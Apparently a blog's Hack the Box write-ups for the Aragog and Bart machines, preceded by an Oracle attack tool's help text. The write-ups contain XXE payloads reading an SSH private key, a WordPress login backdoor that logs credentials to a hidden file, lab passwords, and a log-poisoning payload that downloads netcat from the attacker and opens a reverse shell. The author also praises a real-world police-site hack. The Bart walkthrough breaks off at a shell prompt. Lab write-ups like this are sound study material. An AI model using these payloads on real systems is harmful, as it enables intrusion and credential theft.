    ctxsys            to read files
    externaltable     to read files or to execute system commands/scripts
    dbmsxslprocessor  to upload files
    dbmsadvisor       to upload files
    utlfile           to download/upload/delete files
    dbmsscheduler     to execute system commands without a standard output
    java              to execute system commands
    passwordstealer   to get hashed Oracle passwords
    oradbg            to execute a bin or script
    dbmslob           to download files
    stealremotepwds   to steal hashed passwords thanks an authentication sniffing (CVE-2012-3137)
    userlikepwd       to try each Oracle username stored in the DB like the corresponding pwd
    smb               to capture the SMB authentication
    privesc           to gain elevated access
    cve               to exploit a CVE
    search            to search in databases, tables and columns
    unwrapper         to unwrap PL/SQL source code (no for 9i version)
    clean             clean traces and logs

optional arguments:
  -h, --help          show this help message and exit
  --version           show program's version number and exit

root@kali:/opt/odat# ./odat.py --version
Version 2.3 - 2018/06/03

Hack the Box - Aragog Write up

2018-07-21T00:00:00-04:00

Introduction

Enumeration

Initial Scanning

Like with every hack the box machine lets begin with an nmap scan against aragog (10.10.10.78)

# Nmap 7.70 scan initiated Sat May 12 19:49:54 2018 as: nmap -T4 -sC -A -n -v -p- -oA inital_scan 10.10.10.78
Increasing send delay for 10.10.10.78 from 0 to 5 due to 883 out of 2206 dropped probes since last increase.
Nmap scan report for 10.10.10.78
Host is up (0.14s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r--r--r--    1 ftp      ftp            86 Dec 21 16:30 test.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.14.83
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ad:21:fb:50:16:d4:93:dc:b7:29:1f:4c:c2:61:16:48 (RSA)
|   256 2c:94:00:3c:57:2f:c2:49:77:24:aa:22:6a:43:7d:b1 (ECDSA)
|_  256 9a:ff:8b:e4:0e:98:70:52:29:68:0e:cc:a0:7d:5c:1f (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=5/12%OT=21%CT=1%CU=40756%PV=Y%DS=2%DC=T%G=Y%TM=5AF7814
OS:D%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10D%TI=Z%CI=I%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Uptime guess: 17.011 days (since Wed Apr 25 19:49:01 2018)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 53/tcp)
HOP RTT       ADDRESS
1   144.05 ms 10.10.14.1
2   144.26 ms 10.10.10.78

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 12 20:05:33 2018 -- 1 IP address (1 host up) scanned in 939.01 seconds

From our scan we can see that we have three services available for us to explore. FTP on port 21 which has anonymous login enabled, ssh on 22, and a webserver on port 80.

Enumerating FTP (test.txt)

Lets connect to the ftp server with the anonymous user.

root@dastinia:~/htb/aragog# ftp 10.10.10.78
Connected to 10.10.10.78.
220 (vsFTPd 3.0.3)
Name (10.10.10.78:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.

-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
226 Directory send OK.

We see there is a single file called test.txt

ftp> get test.txt
local: test.txt remote: test.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for test.txt (86 bytes).
226 Transfer complete.
86 bytes received in 0.00 secs (53.2220 kB/s)
ftp> quit
221 Goodbye.

Looking at the test.txt file we see some data related to a subnet_mask, which looks like it might be XML formatted data…

root@dastinia:~/htb/aragog# cat test.txt
<details>
    <subnet_mask>255.255.255.192</subnet_mask>
    <test></test>
</details>

Enumerating Port 80

Upon visiting the server on port 80 you are shown the default apache page.

Running gobuster against the site reveals that the page hosts. php` is available.

root@dastinia:~/htb/aragog# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u  http://10.10.10.78 -x php,html -s 200,204,301,302,307,403 -t 100 | tee gobuster_aragog

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.78/
[+] Threads      : 100
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 204,301,302,307,403,200
[+] Extensions   : .php,.html
=====================================================
/index.html (Status: 200)
/hosts.php (Status: 200)

Visiting hosts.php you see the following landing page…

The page states that: There are 4294967294 possible hosts for.

Looking backwards, let’s take a took at test.txt

test.txt states that our subnet mask is 255.255.255.192, we attempt to do the calculation but realize that we can’t do subnet math in our head! Oh my, we should have paid more attention in intro to networking college! We quickly go back to school and rack up an additional 90,000 USD of student loan debt and we realize that 255.255.255.192 is a /26 which has a maximum of 62 usable hosts per network with 4 possible networks available which means (62 * 4 ) = 248 total possible hosts for the test.txt subnet.

With our near almost complete accredited university enducation education, we that 4294967294 does not equal 248. With our new found knowledge we attempt to send a POST request with the data provided by test.txt in the body of the request.

We see the application react in the following manner….

Interesting, the application reacted just as expected. Let’s attempt a simple XXE injection since we know the application is parsing our input from the requests due to the change in response, and the data is likely XML formatted.

Our payload:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [  
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:////etc/issue" >]>

<details>

    <subnet_mask>&xxe;</subnet_mask>

    <test></test>

</details>

Success.

Exploitation

Reading florian’s ssh private key

Since we are able to read files on system, we can potentially read sensitive files on the box. By reading the contents of /etc/passwd we know that florian and cliff are users on this box & their login shells are set to /bin/bash/

We attempt the user.txt file for both users, and you discover that’ florian’s user is the user we are going after.

We know that ssh is an available service on the box, so let see if florian has an ssh private key for his user.

xml payload

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [  
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:////home/florian/.ssh/id_rsa" >]>


<details>

    <subnet_mask>&xxe;</subnet_mask>

    <test></test>

</details>

Florian ssh_private key

Lets see if we can login with the key

root@dastinia:~/htb/aragog# ssh -i florian_id_rsa florian@10.10.10.78
Last login: Sat Jul 21 05:52:00 2018 from 10.10.14.188
florian@aragog:~$ id
uid=1000(florian) gid=1000(florian) groups=1000(florian)

Look’s like the login was successful. Let’s take a peak at hosts.php real quick

florian@aragog:/var/www/html$ cat hosts.php
<?php

    libxml_disable_entity_loader (false);
    $xmlfile = file_get_contents('php://input');
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $details = simplexml_import_dom($dom);
    $mask = $details->subnet_mask;
    //echo "\r\nYou have provided subnet $mask\r\n";

    $max_bits = '32';
    $cidr = mask2cidr($mask);
    $bits = $max_bits - $cidr;
    $hosts = pow(2,$bits);
    echo "\r\nThere are " . ($hosts - 2) . " possible hosts for $mask\r\n\r\n";

    function mask2cidr($mask){
         $long = ip2long($mask);
         $base = ip2long('255.255.255.255');
         return 32-log(($long ^ $base)+1,2);
    }

?>

Privilege Escalation

Discovering dev_wiki wordpress site

Interesting we see additional content is being served up in our var/www/html directory.

florian@aragog:/var/www/html$ ls -la
total 68
drwxrwxrwx 4 www-data www-data  4096 Jul 21 05:55 .
drwxr-xr-x 3 root     root      4096 Dec 18  2017 ..
drwxrwxrwx 5 cliff    cliff     4096 Jul 21 05:55 dev_wiki
-rw-r--r-- 1 www-data www-data   689 Dec 21  2017 hosts.php
-rw-r--r-- 1 www-data www-data 11321 Dec 18  2017 index.html
-rw-r--r-- 1 florian  florian  36650 Jul 21 05:55 wp-login.php
drw-r--r-- 5 cliff    cliff     4096 Dec 20  2017 zz_backup

Inspecting the contents of the dev_wiki directory, we see that it’s a WordPress blog. Additionally it seems that we have full control over the dev_wiki directory. Let see if we can visit the dev_wiki WordPress site in our browser.

But before we do that we need to add aragog as an entry in our /etc/hosts file first.

echo "10.10.10.78 aragog" >> /etc/hosts

Looking at the blog we see that there’s only one post. Stating that cliff will be logging in regularly.

Lets see what the username/password of the mysql database is…

florian@aragog:/var/www/html/dev_wiki$ cat wp-config.php
<?php
...[snip]...

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wp_wiki');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', '$@y6CHJ^$#5c37j$#6h');

/** MySQL hostname */
define('DB_HOST', 'localhost');

Let’s have a look at the wordpress database & see if we can discover any WP user passwords we can crack.

florian@aragog:/var/www/html/dev_wiki$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 55
Server version: 5.7.20-0ubuntu0.16.04.1 (Ubuntu)

Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| wp_wiki            |
+--------------------+
5 rows in set (0.03 sec)

mysql> use wp_wiki;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------------+
| Tables_in_wp_wiki     |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.01 sec)

mysql> select * from wp_users;
+----+---------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+---------------+
| ID | user_login    | user_pass                          | user_nicename | user_email      | user_url | user_registered     | user_activation_key | user_status | display_name  |
+----+---------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+---------------+
|  1 | Administrator | $P$B3FUuIdSDW0IaIc4vsjj.NzJDkiscu. | administrator | it@megacorp.com |          | 2017-12-20 23:26:04 |                     |           0 | Administrator |
+----+---------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+---------------+
1 row in set (0.01 sec)

mysql>

We attempt to crack the hash with john the ripper & the rockyou wordlist but was unsuccessful so likely this is unrelated.

Performing process monitoring with pspy

While doing your enumeration you would notice that the dev_wiki directory was getting deleted constantly on every few minutes or so. To get a better idea of whats going on we can try to monitor the running processes on the box.

Hack the box Member 0b5cur17y created a fantastic tool called pspy. It’s very common for HTB machines to require to guess random crontab stuff or find parameters/process commandlines. If you view the original thread you will understand what I mean.

using pspy to discover wp-login.py

florian@aragog:/tmp/.ps$ wget -q http://10.10.15.207:7777/pspy64
florian@aragog:/tmp/.ps$ chmod +x pspy64
florian@aragog:/tmp/.ps$ ./pspy64

After some time we see that there is a cronjob that is constantly deleting the dev_wiki folder & replacing it with the backup folder… & a script wp-login.py is ran shortly after that process happens.

2018/07/21 06:35:01 CMD: UID=1001 PID=3870   | /bin/sh -c /usr/bin/python /home/cliff/wp-login.py
2018/07/21 06:35:01 CMD: UID=0    PID=3869   | /usr/sbin/CRON -f
2018/07/21 06:35:01 CMD: UID=1001 PID=3868   | /bin/sh -c /usr/bin/python /home/cliff/wp-login.py
2018/07/21 06:35:01 CMD: UID=0    PID=3867   | /usr/sbin/CRON -f
2018/07/21 06:35:01 CMD: UID=0    PID=3866   | /usr/sbin/CRON -f
2018/07/21 06:35:01 CMD: UID=0    PID=3872   | rm -rf /var/www/html/dev_wiki/
2018/07/21 06:35:01 CMD: UID=0    PID=3871   | /bin/bash /root/restore.sh
2018/07/21 06:35:01 CMD: UID=0    PID=3873   | cp -R /var/www/html/zz_backup/ /var/www/html/dev_wiki/
2018/07/21 06:35:01 CMD: UID=1001 PID=3875   |
2018/07/21 06:35:01 CMD: UID=1001 PID=3874   | sh -c LC_ALL=C LANG=C /sbin/ldconfig -p 2>/dev/null
2018/07/21 06:35:01 CMD: UID=0    PID=3878   | chown -R cliff:cliff /var/www/html/dev_wiki/
2018/07/21 06:35:01 CMD: UID=0    PID=3879   | chmod -R 777 /var/www/html/dev_wiki/

If you google wp-login.py and we find the following Github Gist of wp-login.py

Remember that blog post? “I’ll be logging in regularly”

Backdooring Wordpress to Log Requests & Getting Root

So there’s a few possible ways we can try to accomplish this. Backdoor wp-login.php to send a request to our server with the login details or have wordpress log the post requeset to a file. We can also modify the wp-includes\user.php login function hook to log the username & password to a file.

This part was a bit troubling since there were a few ways to accomplish this task, and depending on which path you took. I consulted with some other HTB members & a good chunk of them went the wp-login.php route which I felt like was much harder.

There’s a few good examples of how to “Backdoor Wordpress”, but I think the best example I’ve ever seen of backdooring a wordpress site was when phineas fisher hacked the catalan police department. It was very simple, clean, and pretty discrete. I honestly think this dude is a legend, and he recorded how he did it & posted it on the internet for people to learn. Some fantastic learning can be done from the video of the hack he did, I highly recommend watching it in full. (Also an obglitatory #hackback)

Video Phineas Fisher Hacks Catalan Police Department stop watching at: 30:01.

backdoor php code

file_put_contents("wp-includes/.m.php","WP :" . $_POST['log']
    . " : " . $_POST['pwd'] . "\n", FILE_APPEND);

We run some tests & we see that our backdoor works. After some time you see the cleartext login credentials for the administrator account in our log.

florian@aragog:/var/www/html/dev_wiki/wp-includes$ cat .m.php
WP :tsst : test
WP :Administrator : !KRgYs(JFO!&MTr)lf
WP :medic : medic

getting root

florian@aragog:/var/www/html/dev_wiki/wp-includes$ su root
Password:
root@aragog:/var/www/html/dev_wiki/wp-includes# id
uid=0(root) gid=0(root) groups=0(root)
root@aragog:/var/www/html/dev_wiki/wp-includes#
root@aragog:/var/www/html/dev_wiki/wp-includes# cat /root/root.txt
9a9da5.....

Lets take a peak at restore.sh & wp-login.py

restore.sh

root@aragog:~# cat restore.sh
rm -rf /var/www/html/dev_wiki/
cp -R /var/www/html/zz_backup/ /var/www/html/dev_wiki/
chown -R cliff:cliff /var/www/html/dev_wiki/
chmod -R 777 /var/www/html/dev_wiki/

wp-login.py

root@aragog:/home/cliff# cat wp-login.py
import requests

wp_login = 'http://127.0.0.1/dev_wiki/wp-login.php'
wp_admin = 'http://127.0.0.1/dev_wiki/wp-admin/'
username = 'Administrator'
password = '!KRgYs(JFO!&MTr)lf'

with requests.Session() as s:
    headers1 = { 'Cookie':'wordpress_test_cookie=WP Cookie check' }
    datas={
        'log':username, 'pwd':password, 'wp-submit':'Log In',
        'redirect_to':wp_admin, 'testcookie':'1'
    }
    s.post(wp_login, headers=headers1, data=datas)
    resp = s.get(wp_admin)
    print(resp.text)

That’s all for now folks.

Hack the Box - Bart Write up

2018-07-14T00:00:00-04:00

Introduction

I felt like Bart was a pretty good box. It’s extremely similar to some of the boxes in the OSCP labs, and the avenue used to get code execution I’ve already seen at least twice so far. If you are taking the OSCP (I currently am) I highly recommend going through the motions of this box because Bart is a prime example of a potential box you would get, with very similar attack vectors that you need to be able to exploit. I plan on editing this write-up a bit later to include how to complete this box without the use of Metasploit, but only after I get some sleep since I’ve been up all night. Sorry if there are any quailty control mistakes in advance it’s too early for me.

Tools Used

Enumeration

Initial Scanning

Like with every hack the box machine lets begin with an nmap scan against Bart (10.10.10.81)

root@dastinia:~/htb/bart# nmap -sV -sC 10.10.10.81 -oA nmap/bart_initscan
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-11 21:17 EDT
Nmap scan report for 10.10.10.81
Host is up (0.18s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://forum.bart.htb/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.00 seconds

We see that the only available service is the IIS web service running on port 80. We can also determine from the IIS 10 http header that this is likely a windows server 2016 or windows 10 system running under the hood.

Enumeration Port 80 (forum.bart.htb (wordpress))

From our nmap scan we can that we are being redirected automatically to forum.bart.htb. Since htb doesn’t have global dns, we aren’t going to be able to resolve the site. We can add a dns entry in our /etc/hosts file to point 10.10.10.81 to both bart.htb and forum.bart.htb. Reference

adding the /etc/hosts entry

root@dastinia:~/htb/bart# echo "10.10.10.81 forum.bart.htb" >> /etc/hosts
root@dastinia:~/htb/bart# echo "10.10.10.81 bart.htb" >> /etc/hosts

Visiting forum.bart.htb in a browser brings us to a snazzy SPA Wordpress site.

Attempting to access the Wordpress login page ends up with an error: "The page cannot be displayed because an internal server error has occurred." This is strange because there’s not much else going on with the site. Likely is might be some sort of rabbit hole.

Running gobuster on forum.bart.htb doesn't reveal anything extremely interesting. Thinking that maybe there is some hidden content with the site, we mirror the site with wget, and search for interesting content like emails, extra domain names, or hidden pages.

We were able to discover a few potential emails/usernames but nothing that stood out blindly. We did notice that the bart developer Harvey Potter h.potter@bart.htb is the only member of the team not displayed on the main site, but who’s information is stored in a comment on the page.

mirroring site locally

root@dastinia:~/htb/bart/bart_wpsite# wget -r http://forum.bart.htb
root@dastinia:~/htb/bart/bart_wpsite# grep -RiP "bart" forum.bart.htb/
forum.bart.htb/index.html:<title>BART</title>
forum.bart.htb/index.html:<link rel='stylesheet' id='sydney-ie9-css'  href='http://forum.bart.htb/wp-content/themes/sydney/css/ie9.css?ver=4.8.2' type='text/css' media='all' />
forum.bart.htb/index.html:                                                      <h1 class="site-title"><a href="#" rel="home">BART</a></h1>
forum.bart.htb/index.html:                                                                                                                                                              <div class="pos">CEO@BART</div>
forum.bart.htb/index.html:                                                                                                                                                                      <li><a class="mail" href="mailto:s.brown@bart.local" target="_blank"><i class="fa">M</i></a></li>
forum.bart.htb/index.html:                                                                                                                                              <div class="pos">CEO@BART</div>
forum.bart.htb/index.html:                                                                                                                                                                      <li><a class="mail" href="mailto:d.simmons@bart.htb" target="_blank"><i class="fa">M</i></a></li>
forum.bart.htb/index.html:                                                                                                                                                                      <li><a class="mail" href="mailto:r.hilton@bart.htb" target="_blank"><i class="fa">M</i></a></li>
forum.bart.htb/index.html:                                                                                                                                                                              <div class="pos">Developer@BART</div>
forum.bart.htb/index.html:                                                                                                                                                                                      <li><a class="mail" href="mailto:h.potter@bart.htb" target="_blank"><i class="fa">M</i></a></li>
forum.bart.htb/index.html:                                                                                                                                                    
...[snip]...

better grep or extract email addresses

root@dastinia:~/htb/bart/bart_wpsite# grep -RiE -o "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b"
forum.bart.htb/index.html:s.brown@bart.local
forum.bart.htb/index.html:d.simmons@bart.htb
forum.bart.htb/index.html:r.hilton@bart.htb
forum.bart.htb/index.html:h.potter@bart.htb
forum.bart.htb/index.html:info@bart.htb
forum.bart.htb/index.html:info@bart.htb

Discovering Monitoring Portal with Wfuzz

Taking a step back, and attempting to enumerate the root of the domain – bart.htb with gobuster you discover that the site seems to be returning some kind of content on every request..

gobuster on bart.htb

root@dastinia:~/htb/bart# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u  http://bart.htb/ -x php,html -s 200,204,301,302,307,403 -t 100 | tee gobuster_bart

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://bart.htb/
[+] Threads      : 100
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 204,301,302,307,403,200
[+] Extensions   : .php,.html
=====================================================
/index (Status: 200)
/news (Status: 200)
/crack (Status: 200)
/download (Status: 200)
/2006 (Status: 200)
/images (Status: 200)
/serial (Status: 200)
/warez (Status: 200)
/full (Status: 200)
/12 (Status: 200)
/contact (Status: 200)
/about (Status: 200)
/search (Status: 200)
/spacer (Status: 200)
/logo (Status: 200)
/privacy (Status: 200)
/11 (Status: 200)
/new (Status: 200)
/blog (Status: 200)
/rss (Status: 200)
/home (Status: 200)
/faq (Status: 200)
/cgi-bin (Status: 200)
/10 (Status: 200)
/archives (Status: 200)
/products (Status: 200)
/sitemap (Status: 200)
/default (Status: 200)
/img (Status: 200)
/2005 (Status: 200)
/1 (Status: 200)
/09 (Status: 200)
/links (Status: 200)
/01 (Status: 200)
/08 (Status: 200)
/06 (Status: 200)
/2 (Status: 200)
/07 (Status: 200)
/articles (Status: 200)
/login (Status: 200)
/keygen (Status: 200)
/article (Status: 200)
...[snip]...

Visiting the page in a browser you see that every page you attempt to go to returns the same error page. This technique is pretty common in modern web applications to return a page with the error instead of a standard 404 error message stating that something was wrong.

This will render tools like gobuster, dirb or dirbuster basically useless to gather information since the results will be filled with false positives or will require additional post process filtering to figure out what’s actually real.

To circumvent this we can use wfuzz as our directory brute forcer, and filter the results based on a character count baseline. As you can see below, the resulting error page wfuzz detects as having 158607 characters in the response. We can use this as our baseline and ignore all responses that have 158607 ch in them, which in turn would only show us pages that are different (unique content) with the --hh flag.

root@dastinia:~/htb/bart# wfuzz -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://bart.htb/FUZZ/

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.2.9 - The Web Fuzzer                         *
********************************************************

Target: http://bart.htb/FUZZ/
Total requests: 220560

==================================================================
ID      Response   Lines      Word         Chars          Payload
==================================================================

000001:  C=302      0 L        0 W            0 Ch        "# directory-list-2.3-medium.txt"
000002:  C=302      0 L        0 W            0 Ch        "#"
000009:  C=302      0 L        0 W            0 Ch        "# Suite 300, San Francisco, California, 94105, USA."
000003:  C=302      0 L        0 W            0 Ch        "# Copyright 2007 James Fisher"
000004:  C=302      0 L        0 W            0 Ch        "#"
000005:  C=302      0 L        0 W            0 Ch        "# This work is licensed under the Creative Commons"
000016:  C=200    630 L     3775 W        158607 Ch       "images"
000018:  C=200    630 L     3775 W        158607 Ch       "2006"
000017:  C=200    630 L     3775 W        158607 Ch       "download"
000026:  C=200    630 L     3775 W        158607 Ch       "about"
000021:  C=200    630 L     3775 W        158607 Ch       "serial"
000025:  C=200    630 L     3775 W        158607 Ch       "contact"
000027:  C=200    630 L     3775 W        158607 Ch       "search"
000028:  C=200    630 L     3775 W        158607 Ch       "spacer"
000022:  C=200    630 L     3775 W        158607 Ch       "warez"
000023:  C=200    630 L     3775 W        158607 Ch       "full"
000019:  C=200    630 L     3775 W        158607 Ch       "news"
000024:  C=200    630 L     3775 W        158607 Ch       "12"
000032:  C=200    630 L     3775 W        158607 Ch       "blog"
000029:  C=200    630 L     3775 W        158607 Ch       "privacy"
000034:  C=200    630 L     3775 W        158607 Ch       "10"
000073:  C=200    630 L     3775 W        158607 Ch       "category"
000031:  C=200    630 L     3775 W        158607 Ch       "logo"
000080:  C=200    630 L     3775 W        158607 Ch       "media"
000075:  C=200    630 L     3775 W        158607 Ch       "content"
000033:  C=200    630 L     3775 W        158607 Ch       "new"
000079:  C=200    630 L     3775 W        158607 Ch       "press"
000076:  C=200    630 L     3775 W        158607 Ch       "14"
000083:  C=200    630 L     3775 W        158607 Ch       "icons"
000081:  C=200    630 L     3775 W        158607 Ch       "templates"
000082:  C=200    630 L     3775 W        158607 Ch       "services"
000020:  C=200    630 L     3775 W        158607 Ch       "crack"
000030:  C=200    630 L     3775 W        158607 Ch       "11"
000035:  C=200    630 L     3775 W        158607 Ch       "cgi-bin"
000077:  C=200    630 L     3775 W        158607 Ch       "main"

Using Wfuzz to hide the error page responses

root@dastinia:~/htb/bart# wfuzz -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://bart.htb/FUZZ/ --hh 158607

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.2.9 - The Web Fuzzer                         *
********************************************************

Target: http://bart.htb/FUZZ/
Total requests: 220560

==================================================================
ID      Response   Lines      Word         Chars          Payload
==================================================================

000014:  C=302      0 L        0 W            0 Ch        ""
000067:  C=200    548 L     2412 W        35529 Ch        "forum"
001614:  C=200     80 L      221 W         3423 Ch        "monitor"
002385:  C=200    548 L     2412 W        35529 Ch        "Forum"
019837:  C=200     80 L      221 W         3423 Ch        "Monitor"

From our results we can see that there’s content being served from the “forum” and “monitor” directories with the forum being forum.bart.htb

monitor.bart.htb

Visting monitor.bart.htb in our browser reveals the application “PHP Server Monitor v3.2.1”.

After trying the usual hack the box username:password combininations with no luck we begin looking for another avenue to get into this application. PHP monitor has a password reset function, which only takes a username. When you attempt to do a password reset on a user that doesn’t exist you get the following error.

With this knowledge we can attempt to enumerate usernames in a targeted manner using the information gathered from forum.bart.htb.

I compiled a short list of possible user names from the site:

potential usernames compiled from forum.bart.htb

root@dastinia:~/htb/bart# cat names.txt
s.brown@bart.local
d.simmons@bart.htb
r.hilton@bart.htb
h.potter@bart.htb
info@bart.htb
s.brown
d.simmons
r.hilton
h.potter
info
samantha
brown
daniel
simmons
robert
hilton
harvey
potter

We can use burpsuite intruder coupled with the simple list payload to perform this attack.

This is how we can set up burpsuite intruder to perform our attack.

From the results of our intruder attack we see that we have two valid usernames harvey and daniel.

After some educated guessing you will discover a valid username:password combination of harvey:potter.

When you attempt to authenticate you are redirected to monitor.bart.htb which fails to resolve similar to forums. We add monitor.bart.htb to our /etc/hosts file and attempt to reauthenticate with our newly found credentials.

root@dastinia:~# echo "10.10.10.81 monitor.bart.htb " >> /etc/hosts

After we re-authenticate we are greeted with the following page.

Browsing around you see there is an entry for the “Internal Chat” service

Viewing the details of “Internal Chat” reveals that there is another application on a different domain “internal-01.bart.htb”

Exploitation

Simple Chat Source Code Discovery & Account Registration

Visting internal-01.bart.htb in our browser reveals the login page of bart’s internal “dev chat”.

while running gobuster & sqlmap in the background if you did some googling on “simple chat” you will discover the following github repo https://github.com/magkopian/php-ajax-simple-chat. To validate that these two applications are the same, I inspected the css/chat_global.css file and sure enough it was the same application. Looking at the application’s code we see that’s there is registration functionality. The application doesn’t directly give you an option to register for an account, but it seems shoddily built so likely we can try manually crafting the request to register the account and hope nothing changed (we know the location and the parameters required to register an account from auditing the register.php source code).

Sure enough, we are able to register an account with a username:password of medic:medicmedic on the internal dev chat by crafting our request just right.

Getting RCE through LFI & Log Poisoning

Clicking the log link will cause two alerts to appear that seemly do nothing. Inspecting the original application code, there are no references to a “log” functionality so this must be a 3rd party modification. After some fiddling & inspecting the request history in burp suite, you will see that the application will record the username & your user-agent in a log file as seen below.

Since we can control what our user agent is we can use this to execute php code by visiting the log file page.

GET //log/log.php?username=harvey&filename=log.php HTTP/1.1

Host: internal-01.bart.htb

User-Agent: <?php exec('whoami'); ?> Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Cookie: PHPSESSID=4o03rnotk1l5b2ols3mkmqm8u9

Connection: close

Upgrade-Insecure-Requests: 1

To speed this up I recommend having 2-3 repeater tabs open. One to input commands into, and one to visit the page to trigger the execution.

We upload & execute a 64-bit netcat binary onto the machine (important for later) so we can get an interactive shell.

I injected the following code into the user agent field. Make sure you remember to escape the \.

<?php echo exec("powershell -command \"(New-Object System.Net.WebClient).DownloadFile('http://10.10.15.171:7777/nc.exe','nc.exe')\""); ?>

<?php exec("nc.exe 10.10.15.171 6667 -e cmd.exe"); ?>

getting shell

root@dastinia:~# ncat -lnvp 6667
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::6667
Ncat: Listening on 0.0.0.0:6667
Ncat: Connection from 10.10.10.81.
Ncat: Connection from 10.10.10.81:49886.
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot\internal-01\log>dir
